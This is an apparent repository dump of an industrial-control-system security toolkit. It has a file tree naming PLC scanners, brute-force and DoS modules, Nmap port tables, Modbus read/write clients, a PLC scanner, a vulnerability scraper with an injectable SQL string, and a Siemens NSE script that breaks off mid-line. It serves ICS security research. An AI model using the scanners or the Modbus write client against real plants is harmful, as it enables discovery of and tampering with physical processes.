├── Control_System_Ports.csv ├── Dorks.csv ├── ICS_Nmap_Port.md ├── ModbusPal.jar ├── PlCscan ├── modbus.py ├── plcscan.py └── s7.py ├── PyModbus ├── README.md ├── modbus_read_client.py ├── modbus_rtu_read.py ├── modbus_serial_read.py ├── modbus_server.py └── modbus_write_client.py ├── README.md ├── SCADA_Metasploit_Modules.csv ├── cnvd_spider.py ├── dlrscanner.py ├── ethernetip.py ├── icse-nse ├── BACnet-discover-enumerate.nse ├── Siemens-CommunicationsProcessor.nse ├── Siemens-HMI-miniweb.nse ├── Siemens-SIMATIC-PLC-S7.nse ├── Siemens-Scalance-module.nse ├── Siemens-WINCC.nse ├── atg-info.nse ├── bradford-networks-nac.nse ├── codesys-v2-discover.nse ├── cr3-fingerprint.nse ├── cspv4-info.nse ├── dnp3-enumerate.nse ├── dnp3-info.nse ├── enip-enumerate.nse ├── fox-info.nse ├── iec-identify.nse ├── melsecq-discover-udp.nse ├── melsecq-discover.nse ├── minecraft.nse ├── mms-identify.nse ├── modicon-info.nse ├── mop-discover.nse ├── moxa-enum.nse ├── omrontcp-info.nse ├── omronudp-info.nse ├── pcworx-info.nse ├── proconos-info.nse ├── s7-enumerate.nse ├── s71200-enumerate-old.nse └── stuxnet-detect.nse ├── metasploit └── Simatic S7 1200 CPU command module.rb ├── qModMaster-code-0.4.7.zip ├── scada-tools ├── get_seed_range.py ├── iec-60870-5-104.py ├── iec-61850-8-1.py ├── profinet_scanner.noscapy.py ├── profinet_scanner.scapy.py ├── profinet_set_fuzzer.py ├── profinet_set_network_info.py ├── s7-1200_brute_offline.py ├── s7-1500_brute_offline.py ├── s7-packet-structure.py ├── s7-show-payloads.py ├── s7_password_hashes_extractor.py └── show_byte_sequences.py ├── scadapass.csv └── smod ├── Application └── modules │ └── modbus │ ├── dos │ ├── arp.py │ ├── arp.pyc │ ├── galilRIO.py │ ├── galilRIO.pyc │ ├── writeAllCoils.py │ ├── writeAllCoils.pyc │ ├── writeAllRegister.py │ ├── writeAllRegister.pyc │ ├── writeSingleCoils.py │ ├── writeSingleCoils.pyc │ ├── writeSingleRegister.py │ └── writeSingleRegister.pyc │ ├── function │ ├── fuzzing.py │ ├── fuzzing.pyc │ ├── readCoils.py │ ├── readCoils.pyc │ ├── readCoilsException.py │ ├── readCoilsException.pyc │ ├── readDiscreteInput.py │ ├── readDiscreteInput.pyc │ ├── readDiscreteInputException.py │ ├── readDiscreteInputException.pyc │ ├── readExceptionStatus.py │ ├── readExceptionStatus.pyc │ ├── readHoldingRegister.py │ ├── readHoldingRegister.pyc │ ├── readHoldingRegisterException.py │ ├── readHoldingRegisterException.pyc │ ├── readInputRegister.py │ ├── readInputRegister.pyc │ ├── readInputRegisterException.py │ ├── readInputRegisterException.pyc │ ├── writeSingleCoils.py │ ├── writeSingleCoils.pyc │ ├── writeSingleRegister.py │ └── writeSingleRegister.pyc │ ├── scanner │ ├── arpWatcher.py │ ├── arpWatcher.pyc │ ├── discover.py │ ├── discover.pyc │ ├── getfunc.py │ ├── getfunc.pyc │ ├── uid.py │ └── uid.pyc │ └── sniff │ ├── arp.py │ └── arp.pyc ├── LICENSE.md ├── Output └── output ├── README.md ├── System ├── Core │ ├── Banner.py │ ├── Banner.pyc │ ├── Colors.py │ ├── Colors.pyc │ ├── Global.py │ ├── Global.pyc │ ├── Interface.py │ ├── Interface.pyc │ ├── Loader.py │ ├── Loader.pyc │ ├── Modbus.py │ ├── Modbus.pyc │ ├── __init__.py │ └── __init__.pyc ├── Lib │ ├── __init__.py │ ├── __init__.pyc │ ├── ipcalc.py │ ├── ipcalc.pyc │ ├── pexpect.py │ ├── prettytable.py │ ├── prettytable.pyc │ └── scapy │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ ├── all.py │ │ ├── all.pyc │ │ ├── ansmachine.py │ │ ├── ansmachine.pyc │ │ ├── arch │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ ├── bsd.py │ │ ├── bsd.pyc │ │ ├── linux.py │ │ ├── pcapdnet.py │ │ ├── pcapdnet.pyc │ │ ├── solaris.py │ │ ├── unix.py │ │ ├── unix.pyc │ │ └── windows │ │ │ └── __init__.py │ │ ├── as_resolvers.py │ │ ├── as_resolvers.pyc │ │ ├── asn1 │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ ├── asn1.py │ │ ├── asn1.pyc │ │ ├── ber.py │ │ ├── ber.pyc │ │ ├── mib.py │ │ └── mib.pyc │ │ ├── asn1fields.py │ │ ├── asn1fields.pyc │ │ ├── asn1packet.py │ │ ├── asn1packet.pyc │ │ ├── automaton.py │ │ ├── automaton.pyc │ │ ├── autorun.py │ │ ├── autorun.pyc │ │ ├── base_classes.py │ │ ├── base_classes.pyc │ │ ├── config.py │ │ ├── config.pyc │ │ ├── contrib │ │ ├── __init__.py │ │ ├── avs.py │ │ ├── bgp.py │ │ ├── carp.py │ │ ├── cdp.py │ │ ├── chdlc.py │ │ ├── dtp.py │ │ ├── eigrp.py │ │ ├── etherip.py │ │ ├── gsm_um.py │ │ ├── igmp.py │ │ ├── igmpv3.py │ │ ├── ikev2.py │ │ ├── ldp.py │ │ ├── mpls.py │ │ ├── ospf.py │ │ ├── ppi.py │ │ ├── ppi_cace.py │ │ ├── ppi_geotag.py │ │ ├── ripng.py │ │ ├── rsvp.py │ │ ├── skinny.py │ │ ├── ubberlogger.py │ │ ├── vqp.py │ │ ├── vtp.py │ │ └── wpa_eapol.py │ │ ├── crypto │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ └── cert.py │ │ ├── dadict.py │ │ ├── dadict.pyc │ │ ├── data.py │ │ ├── data.pyc │ │ ├── error.py │ │ ├── error.pyc │ │ ├── fields.py │ │ ├── fields.pyc │ │ ├── layers │ │ ├── __init__.py │ │ ├── __init__.pyc │ │ ├── all.py │ │ ├── all.pyc │ │ ├── bluetooth.py │ │ ├── bluetooth.pyc │ │ ├── dhcp.py │ │ ├── dhcp.pyc │ │ ├── dhcp6.py │ │ ├── dhcp6.pyc │ │ ├── dns.py │ │ ├── dns.pyc │ │ ├── dot11.py │ │ ├── dot11.pyc │ │ ├── gprs.py │ │ ├── gprs.pyc │ │ ├── hsrp.py │ │ ├── hsrp.pyc │ │ ├── inet.py │ │ ├── inet.pyc │ │ ├── inet6.py │ │ ├── inet6.pyc │ │ ├── ipsec.py │ │ ├── ir.py │ │ ├── ir.pyc │ │ ├── isakmp.py │ │ ├── isakmp.pyc │ │ ├── l2.py │ │ ├── l2.pyc │ │ ├── l2tp.py │ │ ├── l2tp.pyc │ │ ├── llmnr.py │ │ ├── llmnr.pyc │ │ ├── mgcp.py │ │ ├── mgcp.pyc │ │ ├── mobileip.py │ │ ├── mobileip.pyc │ │ ├── netbios.py │ │ ├── netbios.pyc │ │ ├── netflow.py │ │ ├── netflow.pyc │ │ ├── ntp.py │ │ ├── ntp.pyc │ │ ├── pflog.py │ │ ├── ppp.py │ │ ├── ppp.pyc │ │ ├── radius.py │ │ ├── radius.pyc │ │ ├── rip.py │ │ ├── rip.pyc │ │ ├── rtp.py │ │ ├── rtp.pyc │ │ ├── sctp.py │ │ ├── sctp.pyc │ │ ├── sebek.py │ │ ├── sebek.pyc │ │ ├── skinny.py │ │ ├── skinny.pyc │ │ ├── smb.py │ │ ├── smb.pyc │ │ ├── snmp.py │ │ ├── snmp.pyc │ │ ├── tftp.py │ │ ├── tftp.pyc │ │ ├── vrrp.py │ │ ├── vrrp.pyc │ │ ├── x509.py │ │ └── x509.pyc │ │ ├── main.py │ │ ├── main.pyc │ │ ├── modules │ │ ├── __init__.py │ │ ├── geoip.py │ │ ├── nmap.py │ │ ├── p0f.py │ │ ├── queso.py │ │ └── voip.py │ │ ├── packet.py │ │ ├── packet.pyc │ │ ├── pipetool.py │ │ ├── pipetool.pyc │ │ ├── plist.py │ │ ├── plist.pyc │ │ ├── pton_ntop.py │ │ ├── route.py │ │ ├── route.pyc │ │ ├── route6.py │ │ ├── route6.pyc │ │ ├── scapypipes.py │ │ ├── scapypipes.pyc │ │ ├── sendrecv.py │ │ ├── sendrecv.pyc │ │ ├── supersocket.py │ │ ├── supersocket.pyc │ │ ├── themes.py │ │ ├── themes.pyc │ │ ├── tools │ │ ├── UTscapy.py │ │ ├── __init__.py │ │ └── check_asdis.py │ │ ├── utils.py │ │ ├── utils.pyc │ │ ├── utils6.py │ │ ├── utils6.pyc │ │ ├── volatile.py │ │ └── volatile.pyc ├── __init__.py └── __init__.pyc └── smod.py /Dorks.csv: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/Dorks.csv -------------------------------------------------------------------------------- /ICS_Nmap_Port.md: -------------------------------------------------------------------------------- 1 | ### Nmap NSE Scripts 2 | Nmap Script | Port | information 3 | ---|---|--- 4 | mms-identify.nse| 102 |iec-61850-8-1 (mms) ics protocol 5 | s7-enumerate.nse| 102 |numerates Siemens S7 PLC Devices and collects their device information 6 | modbus-discover.nse |502| Enumerates SCADA Modbus slave ids (sids) and collects their device information 7 | modicon-info.nse| 502 |use Modbus to communicate to the PLC via Normal queries that are performed via engineering software 8 | cr3-fingerprint.nse| 789| Fingerprints Red Lion HMI devices 9 | moxa-enum.nse| 4800| MoxaNPort 10 | melsecq-discover.nse |5007| MELSEC-Q Series PLC CPUINFO 11 | melsecq-discover-udp.nse| 5006| MELSEC-Q Series PLC CPUINFO 12 | BACnet-discover-enumerate.nse | 47808 | BACnet 13 | atg-info.nse| 10001| Guardian AST I20100 14 | codesys-v2-discover.nse| 1200/2455| received then the output will show that the port as CoDeSyS 15 | cspv4-info.nse| 2222| cspv4-info 16 | dnp3-info.nse| 20000| DNP3 17 | enip-enumerate.nse| 44818| Information that is parsed includes Vendor ID, Device Type, Product name, Serial Number, Product code,Revision Number, as well as the Device IP 18 | fox-info.nse| 1911| collect information from A Tridium Niagara system 19 | omrontcp-info.nse| 9600| Controller Data Read Command and once a response is received 20 | omronudp-info.nse| 9600| Controller Data Read Command and once a response is received 21 | pcworx-info.nse |1962| PCWorx info 22 | proconos-info.nse| 20547| ProConOs 23 | Siemens-CommunicationsProcessor.nse | 80 | Checks for SCADA Siemens S7 Communications Processor devices 24 | Siemens-HMI-miniweb.nse | 80 | Checks for SCADA Siemens SIMATIC S7- devices 25 | Siemens-SIMATIC-PLC-S7.nse | 80 | Checks for SCADA Siemens Simatic S7 devices 26 | Siemens-Scalance-module.nse | 161 | Checks for SCADA Siemens SCALANCE modules 27 | Siemens-WINCC.nse | 137 | Checks for SCADA Siemens WINCC server 28 | bradford-networks-nac.nse | 8080 | Attempts to detect Bradford Networks Network Sentry appliance admin web interface 29 | iec-identify.nse | 2404 | Attemts to check tcp/2404 port supporting IEC 60870-5-104 ICS protocol 30 | minecraft.nse | 25565 | Checks for Minecraft Servers using the 0x02 "Handshake" protocol 31 | mop-discover.nse | Null | Detect the Maintenance Operation Protocol (MOP) by sending layer 2 DEC DNA Remote Console hello/test messages 32 | stuxnet-detect.nse | 445 |Detects whether a host is infected with the Stuxnet worm 33 | 34 | ### Other Port 35 | 36 | Port | Service 37 | ---|--- 38 | 80 | http 39 | 21 | ftp 40 | 22 | ssh 41 | 23 | telnet 42 | 443 | https 43 | 4000 | ROC PLus TCP/UDP 44 | 50000 | FL-net 45 | 771 | RealPort 46 | 34980 | 47 | 1089-1091 | 48 | 4840 | 49 | 34962-34964 | 50 | 2123/2152/3386 | GPRS Tunneling 51 | 5094 | HART-IP 52 | 17185 | Vxworks WDB 53 | 37777 | Dahua Dvr 54 | -------------------------------------------------------------------------------- /ModbusPal.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/ModbusPal.jar -------------------------------------------------------------------------------- /PlCscan/plcscan.py: -------------------------------------------------------------------------------- 1 | """ 2 | File: plcscan.py 3 | Desc: PLC scanner 4 | Version: 0.1 5 | 6 | Copyright (c) 2012 Dmitry Efanov (Positive Research) 7 | """ 8 | 9 | __author__ = 'defanov' 10 | import modbus 11 | import s7 12 | 13 | import sys 14 | from optparse import OptionParser 15 | import socket 16 | import struct 17 | 18 | def status(msg): 19 | sys.stderr.write(msg[:-1][:39].ljust(39,' ')+msg[-1:]) 20 | 21 | def get_ip_list(mask): 22 | try: 23 | net_addr,mask = mask.split('/') 24 | mask = int(mask) 25 | start, = struct.unpack('!L', socket.inet_aton(net_addr)) 26 | start &= 0xFFFFFFFF << (32-mask) 27 | end = start | ( 0xFFFFFFFF >> mask ) 28 | return [socket.inet_ntoa(struct.pack('!L', addr)) for addr in range(start+1, end)] 29 | except (struct.error,socket.error): 30 | return [] 31 | 32 | def scan(argv): 33 | parser = OptionParser( 34 | usage = "usage: %prog [options] [ip range]...", 35 | description = """Scan IP range for PLC devices. Support MODBUS and S7COMM protocols 36 | """ 37 | ) 38 | parser.add_option("--hosts-list", dest="hosts_file", help="Scan hosts from FILE", metavar="FILE") 39 | parser.add_option("--ports", dest="ports", help="Scan ports from PORTS", metavar="PORTS", default="102,502") 40 | parser.add_option("--timeout", dest="connect_timeout", help="Connection timeout (seconds)", metavar="TIMEOUT", type="float", default=1) 41 | 42 | modbus.AddOptions(parser) 43 | s7.AddOptions(parser) 44 | 45 | (options, args) = parser.parse_args(argv) 46 | 47 | scan_hosts = [] 48 | if options.hosts_file: 49 | try: 50 | scan_hosts = [file.strip() for file in open(options.hosts_file, 'r')] 51 | except IOError: 52 | print "Can't open file %s" % options.hosts_file 53 | 54 | for ip in args: 55 | scan_hosts.extend(get_ip_list(ip) if '/' in ip else 56 | [ip]) 57 | 58 | scan_ports = [int(port) for port in options.ports.split(',')] 59 | 60 | if not scan_hosts: 61 | print "No targets to scan\n\n" 62 | parser.print_help() 63 | exit() 64 | 65 | status("Scan start...\n") 66 | for host in scan_hosts: 67 | splitted = host.split(':') 68 | host = splitted[0] 69 | if len(splitted)==2: 70 | ports = [int(splitted[1])] 71 | else: 72 | ports = scan_ports 73 | for port in ports: 74 | status("%s:%d...\r" % (host, port)) 75 | try: 76 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 77 | sock.settimeout(options.connect_timeout) 78 | sock.connect((host,port)) 79 | sock.close() 80 | except socket.error: 81 | continue 82 | 83 | if port == 102: 84 | res = s7.Scan(host, port, options) 85 | elif port == 502: 86 | res = modbus.Scan(host, port, options) 87 | else: 88 | res = modbus.Scan(host, port, options) or s7.Scan(host, port, options) 89 | 90 | if not res: 91 | print "%s:%d unknown protocol" % (host, port) 92 | 93 | 94 | status("Scan complete\n") 95 | 96 | if __name__=="__main__": 97 | try: 98 | scan(sys.argv[1:]) 99 | except KeyboardInterrupt: 100 | status("Scan terminated\n") 101 | 102 | -------------------------------------------------------------------------------- /PyModbus/README.md: -------------------------------------------------------------------------------- 1 | #PyModbus 2 | ## Modbus Client and Server written in Python-2.7. 3 | * Modbus Read Client 4 | * Modbus Write Client 5 | * Modbus Server 6 | * Modbus RTU Read Client over TCP Port Server 7 | * Modbus RTU Read Client over Serial Port 8 | * Source code in Tar: https://github.com/pal100/PyModbus/tarball/master 9 | * Source code in Zip: https://github.com/pal100/PyModbus/zipball/master 10 | -------------------------------------------------------------------------------- /PyModbus/modbus_read_client.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # version 2.7 3 | import socket 4 | from sys import argv,exit 5 | from array import array 6 | from time import sleep 7 | if len(argv) < 6 or argv[1] == '-h' or argv[1] == '--help' or argv[1] == '?': 8 | print "usage: python modbus_read_client.py Host Unit FC Address Length" 9 | exit() 10 | HOST = argv[1] # The remote host 11 | #HOST = '192.168.5.30' # The remote host 12 | PORT = 502 # The same port as used by the server 13 | UNIT = int(argv[2]) 14 | FC = int(argv[3]) 15 | ADD = int(argv[4]) 16 | LEN = int(argv[5]) 17 | lLEN = LEN & 0x00FF 18 | mLEN = LEN >> 8 19 | if (FC < 3): BYT = (lambda x: x/8 if (x%8==0) else x/8+1)(LEN) #Round off the no. of bytes 20 | else: BYT = LEN*2 21 | lADD = ADD & 0x00FF 22 | mADD = (ADD & 0xFF00)>>8 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | s.connect((HOST, PORT)) 25 | cmd = array('B', [00,00,00,00,00,06,UNIT,FC,mADD,lADD,mLEN,lLEN]) 26 | while 1: 27 | s.send(cmd) 28 | buffer = array('B', [0]*(BYT+9)) 29 | s.recv_into(buffer) 30 | buf = buffer[9:(9+BYT)] 31 | print 'Received', buffer 32 | if (FC > 2): 33 | for j in range(BYT/2): 34 | #print 'data for Reg',(BYT/2)-1-j,'=', (buffer[(-j*2)-2]<<8)+buffer[(-j*2)-1] 35 | print 'data for Reg',j,'=', (buf[(j*2)]<<8)+buf[j*2+1] 36 | else: 37 | for j in range(BYT): 38 | #print 'data for Bytes',BYT-1-j,'=', buffer[-1-j] 39 | print 'data for Byte',j,'=', buf[j] 40 | sleep(1) 41 | 42 | 43 | -------------------------------------------------------------------------------- /PyModbus/modbus_rtu_read.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # version 2.7 3 | # Read Modbus RTU over TCP Port Server 4 | import socket 5 | from sys import argv,exit 6 | from array import array 7 | from time import sleep 8 | if len(argv) < 7 or argv[1] == '-h' or argv[1] == '--help' or argv[1] == '?': 9 | print "usage: python modbus_rtu_read.py Host Port Unit FC Address Length" 10 | exit() 11 | def CRC(list): 12 | crc = 0xffff 13 | for l in list: 14 | c = l ^ crc 15 | for i in range (8): 16 | if (c & 0x0001) != 0: 17 | c = c >> 1 18 | c = c ^ 0xA001 19 | else: 20 | c = c >> 1 21 | crc = c 22 | return crc 23 | HOST = argv[1] 24 | PORT = int(argv[2]) 25 | UNIT = int(argv[3]) 26 | FC = int(argv[4]) 27 | ADD = int(argv[5]) 28 | LEN = int(argv[6]) 29 | lLEN = LEN & 0x00FF 30 | mLEN = LEN >> 8 31 | if (FC < 3): BYT = (lambda x: x/8 if (x%8==0) else x/8+1)(LEN) #Round off the no. of bytes 32 | else: BYT = LEN*2 33 | lADD = ADD & 0x00FF 34 | mADD = (ADD & 0xFF00)>>8 35 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 36 | s.connect((HOST, PORT)) 37 | cmd = array('B', [UNIT,FC,mADD,lADD,mLEN,lLEN]) 38 | crc = CRC(cmd) 39 | lcrc = crc & 0x00FF 40 | mcrc = (crc & 0xFF00)>>8 41 | cmd = array('B', [UNIT,FC,mADD,lADD,mLEN,lLEN,lcrc,mcrc]) 42 | while 1: 43 | s.send(cmd) 44 | buffer = array('B', [0]*(BYT+7)) 45 | s.recv_into(buffer) 46 | buf = buffer[3:(3+BYT)] 47 | print 'Received', buffer 48 | if (FC > 2): 49 | for j in range(BYT/2): 50 | #print 'data for Reg',(BYT/2)-1-j,'=', (buffer[(-j*2)-2]<<8)+buffer[(-j*2)-1] 51 | print 'data for Reg',j,'=', (buf[(j*2)]<<8)+buf[j*2+1] 52 | else: 53 | for j in range(BYT): 54 | #print 'data for Bytes',BYT-1-j,'=', buffer[-1-j] 55 | print 'data for Byte',j,'=', buf[j] 56 | sleep(2) 57 | -------------------------------------------------------------------------------- /PyModbus/modbus_serial_read.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # version 2.7 3 | # Read Modbus RTU Serial 4 | from serial import Serial 5 | from sys import argv,exit 6 | from struct import pack_into 7 | from array import array 8 | from time import sleep 9 | from struct import unpack 10 | if len(argv) < 6 or argv[1] == '-h' or argv[1] == '--help' or argv[1] == '?': 11 | print "usage: python modbus_rtu_read.py Port Unit FC Address Length" 12 | exit() 13 | def CRC(list): 14 | crc = 0xffff 15 | for l in list: 16 | c = l ^ crc 17 | for i in range (8): 18 | if (c & 0x0001) != 0: 19 | c = c >> 1 20 | c = c ^ 0xA001 21 | else: 22 | c = c >> 1 23 | crc = c 24 | b = array('B',[0]*2) 25 | pack_into('H',b,0,crc) 26 | return b 27 | PORT = argv[1] 28 | UNIT = int(argv[2]) 29 | FC = int(argv[3]) 30 | ADD = int(argv[4]) 31 | LEN = int(argv[5]) 32 | lLEN = LEN & 0x00FF 33 | mLEN = LEN >> 8 34 | if (FC < 3): BYT = (lambda x: x/8 if (x%8==0) else x/8+1)(LEN) #Round off the no. of bytes 35 | else: BYT = LEN*2 36 | lADD = ADD & 0x00FF 37 | mADD = (ADD & 0xFF00)>>8 38 | s = Serial('/dev/'+PORT, timeout=0.5) 39 | s.baudrate = 9600 40 | s.parity = "E" 41 | s.databits = 8 42 | s.stopbits = 1 43 | s.handshake = "none" 44 | s.datatype = "raw" 45 | cmd = array('B', [UNIT,FC,mADD,lADD,mLEN,lLEN]) 46 | cmd.extend(CRC(cmd)) 47 | #lcrc = crc & 0x00FF 48 | #mcrc = (crc & 0xFF00)>>8 49 | #cmd = array('B', [UNIT,FC,mADD,lADD,mLEN,lLEN,lcrc,mcrc]) 50 | while 1: 51 | s.write(cmd) 52 | print cmd 53 | sleep(1) 54 | read = s.read(255) 55 | r = '' 56 | if len(read) > 0: r = unpack('B'*len(read),read) 57 | print 'Received =', r 58 | # s.flushInput() 59 | # s.flushOutput() 60 | sleep(0.5) 61 | -------------------------------------------------------------------------------- /PyModbus/modbus_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # version 2.7 3 | import socket,thread 4 | from array import array 5 | from time import sleep, ctime 6 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | s.bind(('',502)) 8 | s.listen(1) 9 | F = open('modbus.log', 'w', 0) 10 | def TCP(conn,addr,F): 11 | buffer = array('B',[0]*300) 12 | while 1: 13 | try: 14 | conn.recv_into(buffer) 15 | ID = buffer[6] 16 | FC = buffer[7] 17 | mADR = buffer[8] 18 | lADR = buffer[9] 19 | ADR = mADR*256+lADR 20 | LEN = buffer[10]*256+buffer[11] 21 | BYT = LEN*2 22 | print "Received = ",buffer[0:13+buffer[12]] 23 | if (FC < 5 and FC > 0): #Read Inputs or Registers 24 | DAT = array('B') 25 | if FC < 3: 26 | BYT = (lambda x: x/8 if (x%8==0) else x/8+1)(LEN) #Round off the no. of bytes 27 | v = 85 #send 85,86.. for bytes. 28 | for i in range(BYT): 29 | DAT.append(v) 30 | v = (lambda x: x+1 if (x<255) else 85)(v) 31 | else: 32 | for i in range(LEN): #Sends back the address as data 33 | DAT.append(mADR) 34 | DAT.append(lADR) 35 | if (lADR == 255): 36 | lADR = 0 37 | mADR = mADR + 1 38 | else: lADR = lADR + 1 39 | print "ID= %d, Fun.Code= %d, Address= %d, Length= %d" %(ID, FC, ADR, LEN) 40 | conn.send(array('B', [0,0,0,0,0, BYT+3, ID, FC, BYT]) + DAT ) 41 | elif (FC == 15 or FC == 16 or FC == 6): #Write Registers 42 | BYT = buffer[12] 43 | conn.send(array('B', [0,0,0,0,0, 6, ID, FC, mADR, lADR, buffer[10], buffer[11] ] ) ) 44 | buf = buffer[13:(13+BYT)] 45 | message = ': ADR:'+str(ADR)+' ' 46 | if FC == 15: 47 | print "ID= %d, Fun.Code= %d, Address= %d, Length= %d, Bytes= %d" %(ID, FC, ADR, LEN, BYT) 48 | for j in range(BYT): message = message+('Byte:'+str(j)+'='+str(buf[j])+', ') 49 | elif FC == 16: 50 | print "ID= %d, Fun.Code= %d, Address= %d, Length= %d, Bytes= %d" %(ID, FC, ADR, LEN, BYT) 51 | for j in range(BYT/2): message = message+('Reg:'+str(j)+'='+str((buf[j*2]<<8)+(buf[j*2+1]))+', ') 52 | elif FC == 6: 53 | print "ID= %d, Fun.Code= %d, Address= %d, Bytes= %d" %(ID, FC, ADR, LEN) 54 | message = message+('Reg:'+str(LEN)) 55 | print message 56 | F.write(ctime() + message + "\n") 57 | else: 58 | print "Funtion Code %d Not Supported" %FC 59 | exit() 60 | sleep(1) 61 | except Exception, e: 62 | print e, "\nConnection with Client terminated" 63 | exit() 64 | while 1: 65 | conn, addr = s.accept() 66 | print "Connected by", addr[0] 67 | thread.start_new_thread(TCP,(conn,addr,F)) 68 | -------------------------------------------------------------------------------- /PyModbus/modbus_write_client.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # version 2.7 3 | import socket 4 | from sys import argv,exit 5 | from array import array 6 | from time import sleep 7 | if len(argv) < 6 or argv[1] == '-h' or argv[1] == '--help' or argv[1] == '?': 8 | print "usage: python modbus_write_client.py Host Unit FC Address Data[1...n]" 9 | exit() 10 | PORT = 502 # The same port as used by the server 11 | HOST = argv[1] # The remote host 12 | UNIT = int(argv[2]) 13 | FC = int(argv[3]) 14 | ADD = int(argv[4]) 15 | val = [] 16 | for v in range(5,len(argv)): 17 | val.append(int(argv[v])) 18 | VAL = [] 19 | for i in val: 20 | VAL.append((int(i) & 0xFF00)>>8) 21 | VAL.append(int(i) & 0x00FF) 22 | if (FC == 5 or FC == 15): LEN = len(VAL)*8 23 | else: LEN = len(VAL)/2 24 | lADD = ADD & 0x00FF 25 | mADD = ADD >> 8 26 | lLEN = LEN & 0x00FF 27 | mLEN = LEN >> 8 28 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 29 | s.connect((HOST, PORT)) 30 | if (FC == 6 or FC == 5): 31 | cmd = array('B', [00,00,00,00,00,6,UNIT,FC,mADD,lADD]) 32 | else: 33 | cmd = array('B', [00,00,00,00,00,7+len(VAL),UNIT,FC,mADD,lADD,mLEN,lLEN,len(VAL)]) 34 | for i in VAL: 35 | cmd.append(i) 36 | buffer = array('B', [0]*20) 37 | try: 38 | while 1: 39 | print "Send", cmd 40 | s.send(cmd) 41 | s.recv_into(buffer) 42 | print 'Received', buffer[:12] 43 | sleep(1) 44 | except Exception: exit() 45 | 46 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ICSecurity 2 | Industrial control Security Tool 3 | 4 | ## Search Dork && Vulnerability 5 | 6 | https://search.usa.gov/search?utf8=%E2%9C%93&affiliate=us-cert-cs&query=scada&commit=Search 7 | 8 | https://www.zoomeye.org 9 | 10 | https://www.shodan.io 11 | 12 | http://ics.cnvd.org.cn 13 | 14 | ## Industrial Control System Exploitation Framework 15 | ``` 16 | Metasplit | https://github.com/rapid7/metasploit-framework 17 | isf | https://github.com/dark-lbp/isf 18 | ``` 19 | 20 | ## awesome-industrial-control-system-security 21 | https://github.com/hslatman/awesome-industrial-control-system-security 22 | -------------------------------------------------------------------------------- /cnvd_spider.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # vim:fenc=utf-8 4 | # 5 | # Copyright © 2017 xl7dev 6 | # 7 | # Distributed under terms of the MIT license. 8 | 9 | """ 10 | spider ics.cnvd.org.cn 11 | """ 12 | 13 | import requests 14 | import re 15 | from lxml import etree 16 | import MySQLdb 17 | 18 | def spider(): 19 | conn=MySQLdb.connect(host="127.0.0.1",user="root",passwd="123456",port=8889,db="ICSecurity",charset="utf8") 20 | cursor = conn.cursor() 21 | for x in range(10): 22 | url = 'http://ics.cnvd.org.cn/?max=100&offset=%d' % (x * 100) 23 | response = requests.get(url) 24 | print response.status_code,url 25 | if response.status_code == 200: 26 | page = etree.HTML(response.content) 27 | hrefs = page.xpath('//td/a') 28 | spans = page.xpath('//td/span') 29 | times = page.xpath('//tr/td[last()]') 30 | values = zip(hrefs,spans,times) 31 | for href,span,time in values: 32 | #print href.attrib['href']+","+href.attrib['title']+","+span.attrib['class'].replace('red','high').replace('yellow','medium').replace('green','low')+","+(time.text).strip() 33 | sql = 'insert into ics_cnvd(title,href,level,time) values("%s","%s","%s","%s")' % (href.attrib['title'],href.attrib['href'],span.attrib['class'].replace('red','high').replace('yellow','medium').replace('green','low'),(time.text).strip()) 34 | print sql 35 | try: 36 | cursor.execute(sql) 37 | conn.commit() 38 | except MySQLdb.Error,e: 39 | print "Mysql Error %d: %s" % (e.args[0], e.args[1]) 40 | else: 41 | response = requests.get(url) 42 | page = etree.HTML(response.content) 43 | hrefs = page.xpath('//td/a') 44 | spans = page.xpath('//td/span') 45 | times = page.xpath('//tr/td[last()]') 46 | values = zip(hrefs,spans,times) 47 | for href,span,time in values: 48 | #print href.attrib['href']+","+href.attrib['title']+","+span.attrib['class']+","+time.text 49 | sql = 'insert into ics_cnvd(title,href,level,time) values("%s","%s","%s","%s")' % (href.attrib['title'],href.attrib['href'],span.attrib['class'].replace('red','high').replace('yellow','medium').replace('green','low'),(time.text).strip()) 50 | try: 51 | cursor.execute(sql) 52 | conn.commit() 53 | except MySQLdb.Error,e: 54 | print "Mysql Error %d: %s" % (e.args[0], e.args[1]) 55 | if __name__ == "__main__": 56 | spider() 57 | -------------------------------------------------------------------------------- /icse-nse/Siemens-CommunicationsProcessor.nse: -------------------------------------------------------------------------------- 1 | local http = require "http" 2 | local nmap = require "nmap" 3 | local shortport = require "shortport" 4 | local strbuf = require "strbuf" 5 | 6 | 7 | description = [[ 8 | Checks for SCADA Siemens S7 Communications Processor devices. 9 | 10 | The higher the verbosity or debug level, the more disallowed entries are shown. 11 | ]] 12 | 13 | --- 14 | --@output 15 | -- 80/tcp open http syn-ack 16 | -- |_Siemens-CommunicationsProcessor: CP 343-1 CX10 17 | 18 | 19 | 20 | author = "Jose Ramon Palanco, drainware" 21 | license = "Same as Nmap--See http://nmap.org/book/man-legal.html" 22 | categories = {"default", "discovery", "safe"} 23 | 24 | portrule = shortport.http 25 | local last_len = 0 26 | 27 | 28 | local function verify_version(body, output) 29 | local version = nil 30 | 31 | if string.find (body, "/S7Web.css") then 32 | version = body:match("(.-)") 33 | if version == nil then 34 | version = "Unknown version" 35 | end 36 | output = output .. version 37 | return true 38 | elseif string.find (body, "examples/visual_key.htm") then 39 | version 